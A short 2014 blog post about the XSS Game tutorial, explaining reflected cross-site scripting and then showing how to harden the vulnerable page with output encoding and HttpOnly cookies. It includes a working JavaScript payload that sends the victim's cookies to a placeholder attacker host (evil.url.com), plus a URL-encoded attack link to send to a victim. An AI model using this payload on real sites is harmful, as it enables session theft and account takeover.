DISCLAIMER: The information on this site is for educational purposes only. The authors of this blog are not responsible for any kind of misuse of this information.

Tuesday, June 3, 2014

XSS Game Insights

The XSS Game demonstrates one of the most common vulnerabilities found in the wild: cross-site scripting (XSS).
This vulnerability allows us, as attackers, to inject client-side code into a page, where it is executed in the victim's browser together with the rest of the page's client code.
In this challenge, we attack ourselves. This is the first step: the PoC (proof of concept) that demonstrates the vulnerability exists. Since 'alert' executed successfully, any other code will run as well.

The second step is to exploit the vulnerability.
For example, an attacker can write simple client-side code to steal the victim's cookies for the vulnerable site (why not all cookies? Read more about SOP, the same-origin policy):

function httpGet(url)
{
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open("GET", url, false);
    xmlHttp.send(null);
}
httpGet("evil.url.com?cookies="+document.cookie);

Try injecting it into level 1 (wrap this code in <script>...</script>). As you can see, when the page containing our injected code is rendered in the victim's browser, an HTTP request carrying the user's cookies is generated to our site (evil.url.com) }:-D.

So our exploit is ready and tested locally. Now we want to attack the victim.

In the case of level 1, we have to provide the victim with a URL containing our code in the query parameter:

xss-game-url/level1/frame?query=%3Cscript%3E+function+httpGet%28url%29+{+var+xmlHttp+%3D+new+XMLHttpRequest%28%29%3B+xmlHttp.open%28%22GET%22%2C+url%2C+false%29%3B+++++xmlHttp.send%28null%29%3B+}+httpGet%28%22evil.url.com%3Fcookies%3D%22%2Bdocument.cookie%29%3B+%3C%2Fscript%3E

If the victim has installed a plugin such as NoScript (recommended), this simple XSS attack will be prevented.
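On the site's side, the fix for a reflected parameter like level 1's `query` is output encoding, with an HttpOnly session cookie as a second layer so that `document.cookie` does not expose it. The following is an added example, not code from the XSS Game or from this post; the page template, the function names and the sample request are constructed for illustration.

```javascript
// Added example: constructed handler code, not the XSS Game's own source.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can switch the HTML parsing context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Read the "query" parameter the way a server would (percent-decoding, "+" as space).
function getQuery(requestUrl) {
  return new URL(requestUrl, 'http://localhost').searchParams.get('query') || '';
}

// Before: the parameter is concatenated into markup, so a <script> element in it runs.
function renderVulnerable(requestUrl) {
  return '<div>No results were found for <b>' + getQuery(requestUrl) + '</b></div>';
}

// After: the same page, but the parameter is HTML-encoded and displayed as inert text.
function renderHardened(requestUrl) {
  return '<div>No results were found for <b>' + escapeHtml(getQuery(requestUrl)) + '</b></div>';
}

// Defense in depth: an HttpOnly cookie is never returned by document.cookie,
// so script that does get injected cannot read the session identifier.
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample request carrying the harmless alert PoC.
const SAMPLE_URL = '/level1/frame?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E';

console.log('vulnerable:', renderVulnerable(SAMPLE_URL));
console.log('hardened:  ', renderHardened(SAMPLE_URL));
console.log('Set-Cookie:', sessionCookie('sid', 'constructed-session-id'));
```

Encoding must match the output context: `escapeHtml` covers HTML element content and quoted attribute values, not values placed inside a script block or a URL.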

That's it. In this post I wanted to give a more complete picture of XSS attacks.

Happy XSSing ! :D (only on yourself of course ...)